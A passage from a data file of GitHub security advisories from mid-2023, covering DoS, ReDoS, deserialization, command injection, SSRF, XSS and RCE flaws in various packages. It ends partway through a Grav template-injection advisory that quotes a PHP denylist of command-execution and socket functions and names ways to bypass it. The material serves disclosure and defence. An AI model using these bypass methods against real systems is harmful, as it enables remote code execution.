'https://github.com/apache/struts'}, {'type': 'WEB', 'url': 'https://github.com/apache/struts/releases/tag/STRUTS_2_5_31'}, {'type': 'WEB', 'url': 'https://github.com/apache/struts/releases/tag/STRUTS_6_1_2_1'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230706-0005/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/06/14/3'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T20:16:52Z', 'nvd_published_at': None}" 1.4.0,GHSA-gcj9-jj38-hwmc,2023-06-09T19:31:47Z,2023-06-09T19:31:47Z,,['CVE-2021-21328'],Vapor's Metrics integration could cause a system drain,"### Impact This is a DoS attack against anyone who Bootstraps a metrics backend for their Vapor app with the following attack vector: 1. send unlimited requests against a vapor instance with different paths. this will create “unlimited” counters and timers, which will eventually drain the system. 2. downstream services might suffer from this attack as well by being spammed with error paths ### Patches This has been patched in 4.40.1. The `DefaultResponder` will rewrite any undefined route paths for to `vapor_route_undefined` to avoid unlimited counters. ### Workarounds Don't bootstrap a metrics system or upgrade to 4.40.1 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Vapor](https://github.com/vapor/vapor) * Ask in [Discord](http://vapor.team)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/vapor/vapor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.40.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.40.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/vapor/vapor/security/advisories/GHSA-gcj9-jj38-hwmc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21328'}, {'type': 'WEB', 'url': 'https://github.com/vapor/vapor/commit/e3aa712508db2854ac0ab905696c65fd88fa7e23'}, {'type': 'PACKAGE', 'url': 'https://github.com/vapor/vapor/'}, {'type': 'WEB', 'url': 'https://github.com/vapor/vapor/releases/tag/4.40.1'}, {'type': 'WEB', 'url': 'https://vapor.codes/'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T19:31:47Z', 'nvd_published_at': '2021-02-26T02:15:00Z'}" 1.4.0,GHSA-c2qf-rxjj-qqgw,2023-07-10T22:57:56Z,2023-06-21T06:30:28Z,,['CVE-2022-25883'],semver vulnerable to Regular Expression Denial of Service,"Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'semver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.5.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'semver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.3.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'semver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.7.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25883'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/pull/564'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/pull/585'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/pull/593'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/commit/2f8fd41487acf380194579ecb6f8b1bbfe116be0'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/commit/717534ee353682f3bcf33e60a8af4292626d4441'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/commit/928e56d21150da0413a3333a3148b20e741a920c'}, {'type': 'PACKAGE', 'url': 'https://github.com/npm/node-semver'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/blob/main/classes/range.js#L97-L104'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/blob/main/internal/re.js#L138'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/blob/main/internal/re.js#L160'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-SEMVER-3247795'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T16:52:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-c29g-q3h3-mwcf,2023-06-16T17:47:39Z,2023-06-07T21:30:18Z,,['CVE-2023-33496'],xxl-rpc deserialization vulnerability,xxl-rpc v1.7.0 was discovered to contain a deserialization vulnerability via the component `com.xxl.rpc.core.remoting.net.impl.netty.codec.NettyDecode#decode`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.xuxueli:xxl-rpc-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33496'}, {'type': 'WEB', 'url': 'https://github.com/edirc-wong/record/blob/main/deserialization_vulnerability_report.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/xuxueli/xxl-rpc'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:52:46Z', 'nvd_published_at': None}" 1.4.0,GHSA-vfrj-fv6p-3cpf,2023-06-06T01:38:11Z,2023-06-06T01:38:11Z,,['CVE-2023-33965'],Brook's tproxy server is vulnerable to a drive-by command injection.,The `tproxy` server is vulnerable to a drive-by command injection. An attacker may fool a victim into visiting a malicious web page which will trigger requests to the local `tproxy` service leading to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/txthinking/brook'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20230606'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/txthinking/brook/security/advisories/GHSA-vfrj-fv6p-3cpf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33965'}, {'type': 'WEB', 'url': 'https://github.com/txthinking/brook/commit/314d7070c37babf6c38a0fe1eada872bb74bf03e'}, {'type': 'PACKAGE', 'url': 'https://github.com/txthinking/brook'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:38:11Z', 'nvd_published_at': None}" 1.4.0,GHSA-373w-rj84-pv6x,2023-06-29T15:02:16Z,2023-06-29T15:02:16Z,,[],SafeURL-Python's hostname blocklist does not block FQDNs,"### Description If a hostname was blacklisted, it was possible to bypass the blacklist by requesting the FQDN of the host (e.g. adding `.` to the end). ### Impact The main purpose of this library is to block requests to internal/private IPs and these cannot be bypassed using this finding. But if a library user had specifically set certain hostnames as blocked, then an attacker would be able to circumvent that block to cause SSRFs to request those hostnames. ### Patches Fixed by https://github.com/IncludeSecurity/safeurl-python/pull/6 ### Credit https://github.com/Sim4n6 ",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'SafeURL-Python'}, 'ecosystem_specific': {'affected_functions': ['safeurl.safeurl.Options.isInList']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/IncludeSecurity/safeurl-python/security/advisories/GHSA-373w-rj84-pv6x'}, {'type': 'WEB', 'url': 'https://github.com/IncludeSecurity/safeurl-python/pull/6'}, {'type': 'WEB', 'url': 'https://github.com/IncludeSecurity/safeurl-python/commit/c4f9677f8790a58eaa1953bac286cca75a5f580e'}, {'type': 'PACKAGE', 'url': 'https://github.com/IncludeSecurity/safeurl-python'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-29T15:02:16Z', 'nvd_published_at': None}" 1.4.0,GHSA-455c-vqrf-mghr,2023-06-23T21:37:38Z,2023-06-16T09:30:24Z,,['CVE-2023-2783'],Mattermost Server Missing Authorization vulnerability,"Mattermost Apps Framework fails to verify that a secret provided in the incoming webhook request allowing an attacker to modify the contents of the post sent by the Apps. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.10.0'}, {'fixed': '7.10.1'}]}], 'versions': ['7.10.0']}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.9.0'}, {'fixed': '7.9.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.8.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2783'}, {'type': 'PACKAGE', 'url': 'https://github.com/mattermost/mattermost-server'}, {'type': 'WEB', 'url': 'https://mattermost.com/security-updates'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:37:38Z', 'nvd_published_at': None}" 1.4.0,GHSA-j245-v2mh-5h6f,2023-06-09T16:53:00Z,2023-06-03T12:30:15Z,,['CVE-2023-3086'],TeamPass vulnerable to stored Cross-site Scripting,Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3086'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/1c0825b67eb8f8b5ecc418ff7614423a275e6a79'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/teampass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/17be9e8a-abe8-41db-987f-1d5b0686ae20'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:06:02Z', 'nvd_published_at': None}" 1.4.0,GHSA-97wh-6hmj-g8j9,2023-06-30T20:34:45Z,2023-06-28T15:30:23Z,,['CVE-2023-3445'],Spina Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Stored in GitHub repository spinacms/spina prior to 2.15.1.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'spina'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.15.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3445'}, {'type': 'WEB', 'url': 'https://github.com/spinacms/spina/commit/9adfe7b4807b3cc10dbb7351a26cc32f5d8c14a3'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spina/CVE-2023-3445.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/spinacms/spina'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/18a74a9d-4a2d-4bf8-ae62-56a909427070'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:34:45Z', 'nvd_published_at': None}" 1.4.0,GHSA-74j8-w7f9-pp62,2023-06-30T20:25:52Z,2023-06-30T20:25:52Z,,['CVE-2023-33190'],Improper configuration of RBAC permissions obtaining cluster control permissions,"### Summary Improper configuration of RBAC permissions resulted in obtaining cluster control permissions, which could control the entire cluster deployed with Sealos, as well as hundreds of pods and other resources within the cluster. ### Details detail's is disable by publish. ### PoC detail's is disable by publish. ### Impact + sealos public cloud user + CWE-287 Improper Authentication ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/labring/sealos'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.1-rc4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/labring/sealos/security/advisories/GHSA-74j8-w7f9-pp62'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33190'}, {'type': 'WEB', 'url': 'https://github.com/labring/sealos/commit/4cdf52e55666864e5f90ed502e9fc13e18985b7b'}, {'type': 'PACKAGE', 'url': 'https://github.com/labring/sealos'}]","{'cwe_ids': ['CWE-287', 'CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:25:52Z', 'nvd_published_at': None}" 1.4.0,GHSA-j8xg-fqg3-53r7,2023-06-27T15:48:19Z,2023-06-22T06:30:18Z,,['CVE-2023-26115'],word-wrap vulnerable to Regular Expression Denial of Service,"All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'word-wrap'}, 'ecosystem_specific': {'affected_functions': ['word-wrap']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26115'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/word-wrap/commit/420dce9a2412b21881202b73a3c34f0edc53cb2e'}, {'type': 'PACKAGE', 'url': 'https://github.com/jonschlinkert/word-wrap'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/word-wrap/blob/master/index.js#L39'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/word-wrap/blob/master/index.js%23L39'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/word-wrap/releases/tag/1.2.4'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-4058657'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-WORDWRAP-3149973'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:36:40Z', 'nvd_published_at': None}" 1.4.0,GHSA-xcf7-rvmh-g6q4,2023-06-21T22:07:52Z,2023-06-21T22:07:52Z,,[],`openssl` `X509VerifyParamRef::set_host` buffer over-read,"When this function was passed an empty string, `openssl` would attempt to call `strlen` on it, reading arbitrary memory until it reached a NUL byte. ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'openssl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.0'}, {'fixed': '0.10.55'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sfackler/rust-openssl/issues/1965'}, {'type': 'WEB', 'url': 'https://github.com/sfackler/rust-openssl/pull/1968'}, {'type': 'PACKAGE', 'url': 'https://github.com/sfackler/rust-openssl'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0044.html'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:07:52Z', 'nvd_published_at': None}" 1.4.0,GHSA-9q9m-c65c-37pq,2023-08-28T17:16:39Z,2023-06-05T18:30:27Z,,['CVE-2023-33733'],Reportlab vulnerable to remote code execution,Reportlab up to and including v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'reportlab'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.13'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.6.12'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33733'}, {'type': 'WEB', 'url': 'https://github.com/c53elyas/CVE-2023-33733'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36WOY22ECJCPOXHVTNCHEWOQLL7JSWP4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ALE727IRACYBTTOFIFG57RS4OA2SHIJ/'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-28T17:16:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-853p-5678-hv8f,2023-06-16T17:57:43Z,2023-06-14T20:11:38Z,,['CVE-2023-34449'],ink! vulnerable to incorrect decoding of storage value when using `DelegateCall`,"### Summary The return value when using delegate call mechanics, either through [`CallBuilder::delegate`](https://docs.rs/ink_env/4.2.0/ink_env/call/struct.CallBuilder.html#method.delegate) or [`ink_env::invoke_contract_delegate`](https://docs.rs/ink_env/4.2.0/ink_env/fn.invoke_contract_delegate.html), is being decoded incorrectly. ### Description Consider this minimal example: ```rust // First contract, this will be performing a delegate call to the `Callee`. #[ink(storage)] pub struct Caller { value: u128, } #[ink(message)] pub fn get_value(&self, callee_code_hash: Hash) -> u128 { let result = build_call::() .delegate(callee_code_hash) .exec_input(ExecutionInput::new(Selector::new(ink::selector_bytes!( ""get_value"" )))) .returns::() .invoke(); result } // Different contract, using this code hash for the delegate call. #[ink(storage)] pub struct Callee { value: u128, } #[ink(message)] pub fn get_value(&self) -> u128 { self.value } ``` In this example we are executing the `Callee` code in the context of the `Caller` contract. This means we'll be using the storage values of the `Caller` contract. Running this code we expect the delegate call to return `value` as it was stored in the `Caller` contract. However, due to the reported bug a different value is returned (for the case of `uint`s it is `256` times the expected value). ### Impact After conducting an analysis of the on-chain deployments of ink! contracts on Astar, Shiden, Aleph Zero, Amplitude and Pendulum, we have found that no contracts on those chains have been affected by the issue. This bug was related to the mechanics around decoding a call's return buffer, which was changed as part of https://github.com/paritytech/ink/pull/1450. Since this feature was only released in ink! 4.0.0 no previous versions are affected. ### Mitigations If you have an ink! 4.x series contract, please update it to the [4.2.1](https://github.com/paritytech/ink/releases/tag/v4.2.1) patch release that we just published. ### Credits Thank you Facundo Lerena from [CoinFabrik](https://www.coinfabrik.com) for reporting this problem in a well-structured and responsible way.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ink'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.2.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'ink_env'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/paritytech/ink/security/advisories/GHSA-853p-5678-hv8f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34449'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/ink/pull/1450'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/ink/commit/f1407ee9f87e5f64d467a22d26ee88f61db7f3db'}, {'type': 'WEB', 'url': 'https://docs.rs/ink_env/4.2.0/ink_env/call/struct.CallBuilder.html#method.delegate'}, {'type': 'WEB', 'url': 'https://docs.rs/ink_env/4.2.0/ink_env/fn.invoke_contract_delegate.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/paritytech/ink'}]","{'cwe_ids': ['CWE-253', 'CWE-754'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T20:11:38Z', 'nvd_published_at': None}" 1.4.0,GHSA-98px-6486-j7qc,2023-06-07T13:50:21Z,2023-06-06T16:41:34Z,,['CVE-2023-32683'],Synapse has URL deny list bypass via oEmbed and image URLs when generating previews,"### Impact A discovered oEmbed or image URL can bypass the `url_preview_url_blacklist` setting potentially allowing server side request forgery or bypassing network policies. Impact is limited to IP addresses allowed by the `url_preview_ip_range_blacklist` setting (by default this only allows public IPs) and by the limited information returned to the client: * For discovered oEmbed URLs, any non-JSON response or a JSON response which includes non-oEmbed information is discarded. * For discovered image URLs, any non-image response is discarded. Systems which have URL preview disabled (via the `url_preview_enabled` setting) or have not configured a `url_preview_url_blacklist` are not affected. Because of the uncommon configuration required, the limited information a malicious user, and the amount of guesses/time the attack would need; the severity is rated as low. ### Patches The issue is fixed by #15601. ### Workarounds The default configuration of the `url_preview_ip_range_blacklist` should protect against requests being made to internal infrastructure, URL previews of public URLs is expected. Alternately URL previews could be disabled using the `url_preview_enabled` setting.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.85.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-98px-6486-j7qc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32683'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/15601'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases/tag/v1.85.0'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/matrix-synapse/PYSEC-2023-85.yaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6DH5A5YEB5LRIPP32OUW25FCGZFCZU2/'}]","{'cwe_ids': ['CWE-863', 'CWE-918'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T16:41:34Z', 'nvd_published_at': None}" 1.4.0,GHSA-j3v8-v77f-fvgm,2023-06-16T19:36:52Z,2023-06-16T19:36:52Z,,['CVE-2023-34253'],Grav Server-side Template Injection (SSTI) via Denylist Bypass Vulnerability,"Hi, actually we have sent the bug report to security@getgrav.org on 27th March 2023 and on 10th April 2023. # Grav Server-side Template Injection (SSTI) via Denylist Bypass Vulnerability ## Summary: | **Product** | Grav CMS | | ----------------------- | --------------------------------------------- | | **Vendor** | Grav | | **Severity** | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution | | **Affected Versions** | <= [v1.7.40](https://github.com/getgrav/grav/tree/1.7.40) (Commit [685d762](https://github.com/getgrav/grav/commit/685d76231a057416651ed192a6a2e83720800e61)) (Latest version as of writing) | | **Tested Versions** | v1.7.40 | | **Internal Identifier** | STAR-2023-0006 | | **CVE Identifier** | Reserved CVE-2023-30592, CVE-2023-30593, CVE-2023-30594 | | **CWE(s)** | CWE-184: Incomplete List of Disallowed Inputs, CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine | ## CVSS3.1 Scoring System: **Base Score:** 7.2 (High) **Vector String:** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H` | **Metric** | **Value** | | ---------------------------- | --------- | | **Attack Vector (AV)** | Network | | **Attack Complexity (AC)** | Low | | **Privileges Required (PR)** | High | | **User Interaction (UI)** | None | | **Scope (S)** | Unchanged | | **Confidentiality \(C)** | High | | **Integrity (I)** | High | | **Availability (A)** | High | ## Product Overview: Grav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin. ## Vulnerability Summary: The denylist introduced in commit [9d6a2d](https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83) to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. ## Vulnerability Details: In addressing [CVE-2022-2073](https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/), a denylist was introduced in commit [9d6a2d](https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83) to validate and ensure that dangerous functions could not be executed via injection of malicious templates. The implementation of the denylist can be found in `Utils::isDangerousFunction()` within [/system/src/Grav/Common/Utils.php](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190): ~~~php /** * @param string $name * @return bool */ public static function isDangerousFunction(string $name): bool { static $commandExecutionFunctions = [ 'exec', 'passthru', 'system', 'shell_exec', 'popen', 'proc_open', 'pcntl_exec', ]; static $codeExecutionFunctions = [ 'assert', 'preg_replace', 'create_function', 'include', 'include_once', 'require', 'require_once' ]; static $callbackFunctions = [ 'ob_start' => 0, 'array_diff_uassoc' => -1, 'array_diff_ukey' => -1, 'array_filter' => 1, 'array_intersect_uassoc' => -1, 'array_intersect_ukey' => -1, 'array_map' => 0, 'array_reduce' => 1, 'array_udiff_assoc' => -1, 'array_udiff_uassoc' => [-1, -2], 'array_udiff' => -1, 'array_uintersect_assoc' => -1, 'array_uintersect_uassoc' => [-1, -2], 'array_uintersect' => -1, 'array_walk_recursive' => 1, 'array_walk' => 1, 'assert_options' => 1, 'uasort' => 1, 'uksort' => 1, 'usort' => 1, 'preg_replace_callback' => 1, 'spl_autoload_register' => 0, 'iterator_apply' => 1, 'call_user_func' => 0, 'call_user_func_array' => 0, 'register_shutdown_function' => 0, 'register_tick_function' => 0, 'set_error_handler' => 0, 'set_exception_handler' => 0, 'session_set_save_handler' => [0, 1, 2, 3, 4, 5], 'sqlite_create_aggregate' => [2, 3], 'sqlite_create_function' => 2, ]; static $informationDiscosureFunctions = [ 'phpinfo', 'posix_mkfifo', 'posix_getlogin', 'posix_ttyname', 'getenv', 'get_current_user', 'proc_get_status', 'get_cfg_var', 'disk_free_space', 'disk_total_space', 'diskfreespace', 'getcwd', 'getlastmo', 'getmygid', 'getmyinode', 'getmypid', 'getmyuid' ]; static $otherFunctions = [ 'extract', 'parse_str', 'putenv', 'ini_set', 'mail', 'header', 'proc_nice', 'proc_terminate', 'proc_close', 'pfsockopen', 'fsockopen', 'apache_child_terminate', 'posix_kill', 'posix_mkfifo', 'posix_setpgid', 'posix_setsid', 'posix_setuid', ]; if (in_array($name, $commandExecutionFunctions)) { return true; } if (in_array($name, $codeExecutionFunctions)) { return true; } if (isset($callbackFunctions[$name])) { return true; } if (in_array($name, $informationDiscosureFunctions)) { return true; } if (in_array($name, $otherFunctions)) { return true; } return static::isFilesystemFunction($name); } /** * @param string $name * @return bool */ public static function isFilesystemFunction(string $name): bool { static $fileWriteFunctions = [ 'fopen', 'tmpfile', 'bzopen', 'gzopen', // write to filesystem (partially in combination with reading) 'chgrp', 'chmod', 'chown', 'copy', 'file_put_contents', 'lchgrp', 'lchown', 'link', 'mkdir', 'move_uploaded_file', 'rename', 'rmdir', 'symlink', 'tempnam', 'touch', 'unlink', 'imagepng', 'imagewbmp', 'image2wbmp', 'imagejpeg', 'imagexbm', 'imagegif', 'imagegd', 'imagegd2', 'iptcembed', 'ftp_get', 'ftp_nb_get', ]; static $fileContentFunctions = [ 'file_get_contents', 'file', 'filegroup', 'fileinode', 'fileowner', 'fileperms', 'glob', 'is_executable', 'is_uploaded_file', 'parse_ini_file', 'readfile', 'readlink', 'realpath', 'gzfile', 'readgzfile', 'stat', 'imagecreatefromgif', 'imagecreatefromjpeg', 'imagecreatefrompng', 'imagecreatefromwbmp', 'imagecreatefromxbm', 'imagecreatefromxpm', 'ftp_put', 'ftp_nb_put', 'hash_update_file', 'highlight_file', 'show_source', 'php_strip_whitespace', ]; static $filesystemFunctions = [ // read from filesystem 'file_exists', 'fileatime', 'filectime', 'filemtime', 'filesize', 'filetype', 'is_dir', 'is_file', 'is_link', 'is_readable', 'is_writable', 'is_writeable', 'linkinfo', 'lstat', //'pathinfo', 'getimagesize', 'exif_read_data', 'read_exif_data', 'exif_thumbnail', 'exif_imagetype', 'hash_file', 'hash_hmac_file', 'md5_file', 'sha1_file', 'get_meta_tags', ]; if (in_array($name, $fileWriteFunctions)) { 